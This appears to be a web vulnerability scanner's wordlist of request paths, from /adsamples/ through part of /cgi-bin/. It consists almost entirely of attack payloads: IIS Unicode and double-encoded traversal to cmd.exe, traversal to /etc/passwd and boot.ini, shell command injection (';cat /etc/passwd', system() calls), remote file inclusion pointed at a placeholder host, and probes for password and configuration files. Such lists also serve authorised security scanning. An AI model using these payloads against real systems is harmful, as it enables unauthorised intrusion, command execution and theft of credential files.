/adsamples/..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/adsamples/..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/adsamples/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
/adsamples/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
/adsamples/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
/adsamples/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
/adsamples/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
/adsamples/config/site.csc
/advwebadmin/
/advworks/equipment/catalog_type.asp
/agentadmin.php
/agentrunner.nsf
/akopia/
/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=
/alog.nsf
/analog/
/ans.pl?p=../../../../../usr/bin/id|&blah
/ans/ans.pl?p=../../../../../usr/bin/id|&blah
/anthill/login.php
/app/
/applist.asp
/apps/
/apps/web/index.fcgi?servers=&section=
/archive/
/archive/a_domlog.nsf
/archive/l_domlog.nsf
/article.php?article=4965&post=1111111111
/article.php?sid=\
/asp/
/asp/SQLQHit.asp
/asp/sqlqhit.asp
/atc/
/author.asp
/aux
/awebvisit.stat
/b2-include/b2edit.showposts.php
/backup/
/bak/
/ban.bak
/ban.dat
/ban.log
/banmat.pwd
/banners.php?op=Change
/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
/basilix.php3
/basilix.php3?
/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu
/bb-dnbd/bb-hist.sh
/bb-dnbd/faxsurvey
/bb000001.pl
/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/bbs/
/bbs/admin/
/bbs/admin/config/
/bbs/data/
/bbs/db/
/bbs/include/
/bc4j.html
/beta/
/bigconf.cgi
/billing.nsf
/bin-sdb
/bin/
/bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
/bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/bin/.cobalt/siteUserMod/siteUserMod.cgi
/bin/AT-admin.cgi
/bin/AT-generate.cgi
/bin/AnyForm2
/bin/Board/db/
/bin/CGImail.exe
/bin/Count.cgi
/bin/CrazyWWWBoard.cgi
/bin/Search.pl
/bin/Xrun.cgi
/bin/YaBB.pl
/bin/ad.cgi
/bin/adcycle
/bin/admin.pl
/bin/admin/admin
/bin/aglimpse
/bin/allmanage.pl
/bin/allmanageup.pl
/bin/amlite/amadmin.pl
/bin/anacondaclip.pl?template=check
/bin/auktion.pl
/bin/awl/auctionweaver.pl
/bin/bb-hist.sh
/bin/bbs_forum.cgi
/bin/bizdb1-search.cgi
/bin/bnbform.cgi
/bin/build.cgi
/bin/cached_feed.cgi
/bin/cachemgr.cgi
/bin/cal_make.pl
/bin/calender.pl
/bin/calender_admin.pl
/bin/campas
/bin/cfgwiz.exe
/bin/cgiforum.pl
/bin/cgiwrap
/bin/changepw.cgi
/bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
/bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
/bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
/bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
/bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
/bin/classifieds.cgi
/bin/commerce.cgi?page=check
/bin/common/user_update_admin.pl
/bin/common/user_update_passwd.pl
/bin/contents.htm
/bin/counterfiglet/nc/f
/bin/cvsweb/cvsweb.cgi
/bin/day5datacopier.cgi
/bin/day5datanotifier.cgi
/bin/db2www/library/document.d2w/show
/bin/dcadmin.cgi
/bin/dcboard.cgi
/bin/dcforumlib.pl
/bin/dmailweb.cgi
/bin/dnewsweb.cgi
/bin/dumpenv.pl
/bin/edit.pl
/bin/empower?DB=UkRteamHole
/bin/environ.cgi
/bin/everythingform.cgi
/bin/ezshopper2/loadpage.cgi
/bin/ezshopper3/loadpage.cgi
/bin/faxsurvey
/bin/filemail.pl
/bin/files.pl
/bin/finger
/bin/formmail.cgi
/bin/fpadmin.htm
/bin/fpremadm.exe
/bin/fpsrvadm.exe
/bin/gbook/gbook.cgi?_MAILTO=check;id
/bin/getdoc.cgi
/bin/glimpse
/bin/global.cgi
/bin/guestbook.cgi
/bin/guestbook.pl
/bin/handler
/bin/hsx.cgi
/bin/htgrep
/bin/htmlscript
/bin/htsearch
/bin/htsearch?config=aaa
/bin/ikonboard/help.cgi
/bin/info2www
/bin/infosrch.cgi
/bin/ipf/etc/gfw/ui/pwd.dat
/bin/jj
/bin/lasso.cgi
/bin/loadpage.cgi
/bin/mailfile.cgi
/bin/mailform.pl
/bin/maillist.pl
/bin/mailnews.cgi
/bin/mailto.cgi
/bin/man.sh
/bin/mdma.bat
/bin/mmstdod.cgi?ALTERNATE_TEMPLATES=
/bin/netauth.cgi
/bin/news/news.cgi
/bin/newsdesk.cgi?t=../pass.txt
/bin/nph-maillist.pl
/bin/nph-publish
/bin/nph-test-cgi
/bin/pagelog.cgi
/bin/pals-cgi
/bin/perl
/bin/perl.exe
/bin/perlshop.cgi
/bin/pfdisplay.cgi
/bin/phf
/bin/phf.cgi
/bin/php
/bin/php.cgi
/bin/plusmail
/bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00
/bin/post-query
/bin/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi&TopicSubject=&replyto=0
/bin/processit.pl
/bin/query
/bin/redirect.cgi
/bin/register.cgi
/bin/replicator/webpage.cgi
/bin/responder.cgi
/bin/rpm_query
/bin/rwwwshell.pl
/bin/s.cgi?q=a&tmpl=check
/bin/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir
/bin/scripts/whois.cgi?action=load&whois=check
/bin/search.cgi?letter=
/bin/search/tidfinder.cgi?2956734
/bin/simplestguest.cgi
/bin/simplestmail.cgi
/bin/ssi
/bin/store.cgi?StartID=../etc/hosts%00.html
/bin/subscribe.pl
/bin/survey.cgi
/bin/test-cgi
/bin/textcounter.pl
/bin/ultraboard.cgi
/bin/unlg1.1
/bin/unlg1.2
/bin/upload_file.pl
/bin/ustorekeeper.pl
/bin/view-source
/bin/view_page.html
/bin/w3-msql
/bin/wais.pl
/bin/webdata.cgi
/bin/webdist.cgi
/bin/webdriver
/bin/webgais
/bin/webplus.cgi?Script=/webplus/webping/webping.wml
/bin/websendmail
/bin/webspirs.cgi
/bin/webwho.pl
/bin/whois_raw.cgi
/bin/wrap
/bin/wrap.cgi
/bin/www-sql
/bin/wwwboard.pl
/blah-whatever-badfile.jsp
/blah-whatever.jsp
/blah123.php
/blah_badfile.shtml
/blahb.ida
/blahb.idq
/bo/
/boarddir/postings.cgi
/boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/
/bookmark.nsf
/books.nsf
/bottom.html
/busytime.nsf
/buy/
/buynow/
/c/
/c/inetpub/scripts/root.exe?/c+dir
/c/winnt/system32/cmd.exe?/c+dir
/c/winnt/system32/cmd.exe?/c+dir+/OG
/c32web.exe/ChangeAdminPassword
/ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini
/ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd
/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini
/ca000001.pl?ACTION=SHOWCART&hop=\
/ca000007.pl?ACTION=SHOWCART&REFPAGE=\
/cache-stats/
/calendar.nsf
/carbo.dll
/card/
/cart/
/cartcart.cgi
/caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC
/caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd
/caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server
/caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini
/caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000
/catalog.nsf
/catalog/includes/include_once.php
/categorie.php3?cid=june
/catinfo
/cbms/cbmsfoot.php
/cbms/changepass.php
/cbms/editclient.php
/cbms/passgen.php
/cbms/realinv.php
/cbms/usersetup.php
/ccard/
/ccbill/secure/ccbill.log
/cersvr.nsf
/certa.nsf
/certlog.nsf
/certsrv.nsf
/certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
/certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir
/cfappman/
/cfappman/index.cfm
/cfcache.map
/cfdocs/
/cfdocs/MOLE.CFM
/cfdocs/TOXIC.CFM
/cfdocs/cfcache.map
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/exampleapp/
/cfdocs/exampleapp/docs/sourcewindow.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini
/cfdocs/exampleapp/email/application.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/publish/admin/application.cfm
/cfdocs/examples/
/cfdocs/examples/cvbeans/beaninfo.cfm
/cfdocs/examples/httpclient/mainframeset.cfm
/cfdocs/examples/mainframeset.cfm
/cfdocs/examples/parks/detail.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/expelvel/openfile.cfm
/cfdocs/expeval/ExprCalc.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expressions.cfm
/cfdocs/root.cfm
/cfdocs/snippets/
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/fileexist.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/gettempdirectory.cfm
/cfdocs/snippets/viewexample.cfm
/cfdocs/zero.cfm
/cfide/
/cfide/Administrator/
/cfide/Administrator/startstop.html
/cfide/administrator/index.cfm
/cfusion/cfapps/forums/data/forums.mdb
/cfusion/cfapps/forums/forums_.mdb
/cfusion/cfapps/security/data/realm.mdb
/cfusion/cfapps/security/realm_.mdb
/cfusion/database/cfexamples.mdb
/cfusion/database/cfsnippets.mdb
/cfusion/database/cypress.mdb
/cfusion/database/smpolicy.mdb
/cg-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
/cg-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
/cgi-auth/userreg.cgi
/cgi-bin
/cgi-bin-sdb
/cgi-bin-sdb/printenv
/cgi-bin/
/cgi-bin/
/cgi-bin/   
/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1
/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1
/cgi-bin/%2e%2e/abyss.conf
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%9v../..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../win2000/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../windows/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-bin/..\\..\\..\\..\\..\\..\\winnt\\system32\\cmd.exe?/c+dir+c:\\
/cgi-bin/..\\..\\..\\..\\..\\..\\winnt\system32\cmd.exe?/c+dir+c:\\
/cgi-bin/./test.cgi
/cgi-bin/.access
/cgi-bin/.cobalt
/cgi-bin/.cobalt/alert/service.cgi?service=
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
/cgi-bin/.fhp
/cgi-bin/.htaccess
/cgi-bin/.htaccess.old
/cgi-bin/.htaccess.save
/cgi-bin/.htaccess~
/cgi-bin/.htpasswd
/cgi-bin/.namazu.cgi
/cgi-bin/.nsconfig
/cgi-bin/.passwd
/cgi-bin/.www_acl
/cgi-bin/.wwwacl
/cgi-bin///test.cgi
/cgi-bin//DCShop/Auth_data/auth_user_file.txt
/cgi-bin//GW5/GWWEB.EXE?HELP=bad-request
/cgi-bin//GWWEB.EXE?HELP=bad-request
/cgi-bin//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
/cgi-bin//_vti_pvt/doctodep.btr
/cgi-bin//ans/ans.pl?p=../../../../../usr/bin/id|&blah
/cgi-bin//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
/cgi-bin//board.cgi
/cgi-bin//errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
/cgi-bin//mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
/cgi-bin//mt-static/
/cgi-bin//mt-static/mt-check.cgi
/cgi-bin//mt-static/mt-load.cgi
/cgi-bin//mt/mt.cfg
/cgi-bin//rightfax/fuwww.dll/?
/cgi-bin//scripts/*%0a.pl
/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
/cgi-bin/AnForm2
/cgi-bin/AnyBoard.cgi
/cgi-bin/AnyForm
/cgi-bin/AnyForm2
/cgi-bin/Board/db/
/cgi-bin/CGImail.exe
/cgi-bin/CatalogMgr.pl
/cgi-bin/Cgitest.exe
/cgi-bin/Count.cgi
/cgi-bin/CrazyWWWBoard.cgi
/cgi-bin/DCFORMS98.CGI
/cgi-bin/DCShop/
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-bin/DCShop/orders/orders.txt
/cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
/cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
/cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
/cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
/cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
/cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
/cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
/cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
/cgi-bin/FormHandler.cgi
/cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
/cgi-bin/FormMail.pl
/cgi-bin/FtpSave.dll
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
/cgi-bin/GW5/GWWEB.EXE?HELP=somewhereovertherainbow
/cgi-bin/LWGate
/cgi-bin/LWGate.cgi
/cgi-bin/MachineInfo
/cgi-bin/MsmMask.exe
/cgi-bin/MsmMask.exe?mask=/junk334
/cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-bin/Pbcgi.exe
/cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
/cgi-bin/Search.pl
/cgi-bin/TEST.CGI
/cgi-bin/Textcounter.pl
/cgi-bin/Upload.pl
/cgi-bin/VsSetCookie.exe?
/cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
/cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\
/cgi-bin/WS_FTP.ini
/cgi-bin/Web_Store/web_store.cgi
/cgi-bin/Webnews.exe
/cgi-bin/Xrun.cgi
/cgi-bin/YaBB.pl
/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
/cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=
/cgi-bin/_vti_cnf
/cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd
/cgi-bin/a1stats/a1disp3.cgi
/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
/cgi-bin/a1stats/a1disp3.cgi?/../../../../../../etc/passwd
/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
/cgi-bin/aaaaaa/../test.cgi
/cgi-bin/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/../test.cgi
/cgi-bin/ad.cgi
/cgi-bin/adcycle
/cgi-bin/adcycle/adcenter.cgi
/cgi-bin/add_ftp.cgi
/cgi-bin/addbanner.cgi
/cgi-bin/adduser.cgi
/cgi-bin/admin.cgi
/cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
/cgi-bin/admin.php
/cgi-bin/admin.php3
/cgi-bin/admin.pl
/cgi-bin/admin/admin
/cgi-bin/admin/admin.cgi
/cgi-bin/admin/setup.cgi
/cgi-bin/adminhot.cgi
/cgi-bin/adminwww.cgi
/cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
/cgi-bin/aglimpse
/cgi-bin/aglimpse
/cgi-bin/aglimpse.cgi
/cgi-bin/aglimpse|aglimpse|
/cgi-bin/alibaba.pl
/cgi-bin/alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
/cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
/cgi-bin/allmanage.pl
/cgi-bin/allmanageup.pl
/cgi-bin/amadmin.pl
/cgi-bin/amlite/amadmin.pl
/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
/cgi-bin/anacondaclip.pl?template=check
/cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah
/cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
/cgi-bin/archie
/cgi-bin/architext_query.cgi
/cgi-bin/architext_query.pl
/cgi-bin/ash
/cgi-bin/athcgi.exe?command=showpage&script=
/cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=&Where=&Sort=Photo&Dir=
/cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
/cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd
/cgi-bin/auktion.pl
/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd
/cgi-bin/auth_data/auth_user_file.txt
/cgi-bin/awl/auctionweaver.pl
/cgi-bin/awstats.pl
/cgi-bin/ax-admin.cgi
/cgi-bin/ax.cgi
/cgi-bin/axs.cgi
/cgi-bin/badmin.cgi
/cgi-bin/banner.cgi
/cgi-bin/bannereditor.cgi
/cgi-bin/bash
/cgi-bin/bb-hist.sh
/cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
/cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
/cgi-bin/bb-histlog.sh
/cgi-bin/bb-hostsvc.sh
/cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
/cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/cgi-bin/bbs_forum.cgi
/cgi-bin/betsie/parserl.pl/
/cgi-bin/bigconf.cgi
/cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bnbform
/cgi-bin/bnbform.cgi
/cgi-bin/board.cgi  
/cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi-bin/boozt/admin/index.cgi?section=5&input=1
/cgi-bin/bsguest.cgi
/cgi-bin/bslist.cgi
/cgi-bin/build.cgi
/cgi-bin/bulk/bulk.cgi
/cgi-bin/c32web.exe/ChangeAdminPassword
/cgi-bin/c32web.exe/CheckError?error=53
/cgi-bin/c32web.exe/ShowAdminDir
/cgi-bin/c_download.cgi
/cgi-bin/cached_feed.cgi
/cgi-bin/cachemgr.cgi
/cgi-bin/cal_make.pl
/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00
/cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
/cgi-bin/calendar
/cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
/cgi-bin/calendar.pl
/cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
/cgi-bin/calendar/index.cgi
/cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|
/cgi-bin/calender.pl
/cgi-bin/calender_admin.pl
/cgi-bin/campas
/cgi-bin/campas?%0acat%0a/etc/passwd%0a
/cgi-bin/cart.pl
/cgi-bin/cart32.exe
/cgi-bin/cartmanager.cgi
/cgi-bin/cbmc/forums.cgi
/cgi-bin/ccvsblame.cgi?file=/index.html&root=
/cgi-bin/ceilidh.exe
/cgi-bin/cfgwiz.exe
/cgi-bin/cgforum.cgi
/cgi-bin/cgi-lib.pl
/cgi-bin/cgi-test.exe
/cgi-bin/cgi_process
/cgi-bin/cgiback.cgi
/cgi-bin/cgicso?query=
/cgi-bin/cgicso?query=AAA
/cgi-bin/cgiforum.pl
/cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
/cgi-bin/cgimail.exe
/cgi-bin/cgitest.exe
/cgi-bin/cgiwrap
/cgi-bin/change-your-password.pl
/cgi-bin/changepw.cgi
/cgi-bin/changepw.exe
/cgi-bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
/cgi-bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
/cgi-bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
/cgi-bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
/cgi-bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
/cgi-bin/class/mysql.class
/cgi-bin/classified.cgi
/cgi-bin/classifieds
/cgi-bin/classifieds.cgi
/cgi-bin/classifieds/classifieds.cgi
/cgi-bin/clickcount.pl?view=test
/cgi-bin/clickresponder.pl
/cgi-bin/cmd.exe?/c+dir
/cgi-bin/cmd1.exe?/c+dir
/cgi-bin/code.php
/cgi-bin/code.php3
/cgi-bin/com5..........................................................................................................................................................................................................................box
/cgi-bin/com5.java
/cgi-bin/com5.pl
/cgi-bin/commandit.cgi
/cgi-bin/commerce.cgi
/cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
/cgi-bin/commerce.cgi?page=../../../../etc/passwd%00index.html
/cgi-bin/commerce.cgi?page=check
/cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
/cgi-bin/common/listrec.pl
/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
/cgi-bin/compatible.cgi
/cgi-bin/contents.htm
/cgi-bin/count.cgi
/cgi-bin/counter-ord
/cgi-bin/counterbanner
/cgi-bin/counterbanner-ord
/cgi-bin/counterfiglet-ord
/cgi-bin/counterfiglet/nc/
/cgi-bin/counterfiglet/nc/f
/cgi-bin/cowsconf/config.asc
/cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
/cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
/cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
/cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
/cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
/cgi-bin/csh
/cgi-bin/cstat.pl
/cgi-bin/cvsblame.cgi?file=
/cgi-bin/cvslog.cgi?file=
/cgi-bin/cvslog.cgi?file=*&rev=&root=
/cgi-bin/cvsquery.cgi?branch=>&file=&date=
/cgi-bin/cvsquery.cgi?module=&branch=&dir=&file=&who=&sortby=Date&hours=2&date=week
/cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=&branch=HEAD
/cgi-bin/cvsweb/cvsweb.cgi
/cgi-bin/cvsweb/src/usr.bin/rdist/expand.c
/cgi-bin/dasp/fm_shell.asp
/cgi-bin/date
/cgi-bin/day5datacopier.cgi
/cgi-bin/day5datanotifier.cgi
/cgi-bin/db2www/library/document.d2w/show
/cgi-bin/db4web_c/dbdirname//etc/passwd
/cgi-bin/db_manager.cgi
/cgi-bin/dbman/db.cgi?db=no-db
/cgi-bin/dbmlparser.exe
/cgi-bin/dcadmin.cgi
